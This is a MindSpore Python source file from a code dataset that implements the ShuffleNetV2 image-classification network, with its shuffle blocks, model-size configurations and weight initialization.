5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/shufflenetv2/src/shufflenetv2.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/shufflenetv2/src/shufflenetv2.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
from mindspore import Tensor
import mindspore.nn as nn
import mindspore.ops.operations as P
class ShuffleV2Block(nn.Cell):
def __init__(self, inp, oup, mid_channels, *, ksize, stride):
super(ShuffleV2Block, self).__init__()
self.stride = stride
##assert stride in [1, 2]
self.mid_channels = mid_channels
self.ksize = ksize
pad = ksize // 2
self.pad = pad
self.inp = inp
outputs = oup - inp
branch_main = [
# pw
nn.Conv2d(in_channels=inp, out_channels=mid_channels, kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=mid_channels, momentum=0.9),
nn.ReLU(),
# dw
nn.Conv2d(in_channels=mid_channels, out_channels=mid_channels, kernel_size=ksize, stride=stride,
pad_mode='pad', padding=pad, group=mid_channels, has_bias=False),
nn.BatchNorm2d(num_features=mid_channels, momentum=0.9),
# pw-linear
nn.Conv2d(in_channels=mid_channels, out_channels=outputs, kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=outputs, momentum=0.9),
nn.ReLU(),
]
self.branch_main = nn.SequentialCell(branch_main)
if stride == 2:
branch_proj = [
# dw
nn.Conv2d(in_channels=inp, out_channels=inp, kernel_size=ksize, stride=stride,
pad_mode='pad', padding=pad, group=inp, has_bias=False),
nn.BatchNorm2d(num_features=inp, momentum=0.9),
# pw-linear
nn.Conv2d(in_channels=inp, out_channels=inp, kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=inp, momentum=0.9),
nn.ReLU(),
]
self.branch_proj = nn.SequentialCell(branch_proj)
else:
self.branch_proj = None
self.squeeze = P.Squeeze(axis=0)
def construct(self, old_x):
if self.stride == 1:
x_proj, x = self.channel_shuffle(old_x)
x_proj = self.squeeze(x_proj)
x = self.squeeze(x)
return P.Concat(1)((x_proj, self.branch_main(x)))
if self.stride == 2:
x_proj = old_x
x = old_x
return P.Concat(1)((self.branch_proj(x_proj), self.branch_main(x)))
return None
def channel_shuffle(self, x):
batchsize, num_channels, height, width = P.Shape()(x)
x = P.Reshape()(x, (batchsize * num_channels // 2, 2, height * width,))
x = P.Transpose()(x, (1, 0, 2,))
x = P.Reshape()(x, (2, -1, num_channels // 2, height, width,))
return x[0:1, :, :, :, :], x[-1:, :, :, :, :]
class ShuffleNetV2(nn.Cell):
def __init__(self, input_size=224, n_class=1000, model_size='1.0x'):
super(ShuffleNetV2, self).__init__()
print('model size is ', model_size)
self.stage_repeats = [4, 8, 4]
self.model_size = model_size
if model_size == '0.5x':
self.stage_out_channels = [-1, 24, 48, 96, 192, 1024]
elif model_size == '1.0x':
self.stage_out_channels = [-1, 24, 116, 232, 464, 1024]
elif model_size == '1.5x':
self.stage_out_channels = [-1, 24, 176, 352, 704, 1024]
elif model_size == '2.0x':
self.stage_out_channels = [-1, 24, 244, 488, 976, 2048]
else:
raise NotImplementedError
# building first layer
input_channel = self.stage_out_channels[1]
self.first_conv = nn.SequentialCell([
nn.Conv2d(in_channels=3, out_channels=input_channel, kernel_size=3, stride=2,
pad_mode='pad', padding=1, has_bias=False),
nn.BatchNorm2d(num_features=input_channel, momentum=0.9),
nn.ReLU(),
])
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, pad_mode='same')
self.features = []
for idxstage in range(len(self.stage_repeats)):
numrepeat = self.stage_repeats[idxstage]
output_channel = self.stage_out_channels[idxstage+2]
for i in range(numrepeat):
if i == 0:
self.features.append(ShuffleV2Block(input_channel, output_channel,
mid_channels=output_channel // 2, ksize=3, stride=2))
else:
self.features.append(ShuffleV2Block(input_channel // 2, output_channel,
mid_channels=output_channel // 2, ksize=3, stride=1))
input_channel = output_channel
self.features = nn.SequentialCell([*self.features])
self.conv_last = nn.SequentialCell([
nn.Conv2d(in_channels=input_channel, out_channels=self.stage_out_channels[-1], kernel_size=1, stride=1,
pad_mode='pad', padding=0, has_bias=False),
nn.BatchNorm2d(num_features=self.stage_out_channels[-1], momentum=0.9),
nn.ReLU()
])
self.globalpool = nn.AvgPool2d(kernel_size=7, stride=7, pad_mode='valid')
if self.model_size == '2.0x':
self.dropout = nn.Dropout(keep_prob=0.8)
self.classifier = nn.SequentialCell([nn.Dense(in_channels=self.stage_out_channels[-1],
out_channels=n_class, has_bias=False)])
## init weights
self._initialize_weights()
def construct(self, x):
x = self.first_conv(x)
x = self.maxpool(x)
x = self.features(x)
x = self.conv_last(x)
x = self.globalpool(x)
if self.model_size == '2.0x':
x = self.dropout(x)
x = P.Reshape()(x, (-1, self.stage_out_channels[-1],))
x = self.classifier(x)
return x
def _initialize_weights(self):
for name, m in self.cells_and_names():
if isinstance(m, nn.Conv2d):
if 'first' in name:
m.weight.set_data(Tensor(np.random.normal(0, 0.01,
m.weight.data.shape).astype("float32")))
else:
m.weight.set_data(Tensor(np.random.normal(0, 1.0/m.weight.data.shape[1],
m.weight.data.shape).astype("float32")))
if isinstance(m, nn.Dense):
m.weight.set_data(Tensor(np.random.normal(0, 0.01, m.weight.data.shape).astype("float32")))
| 41.977401 | 115 | 0.564872 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.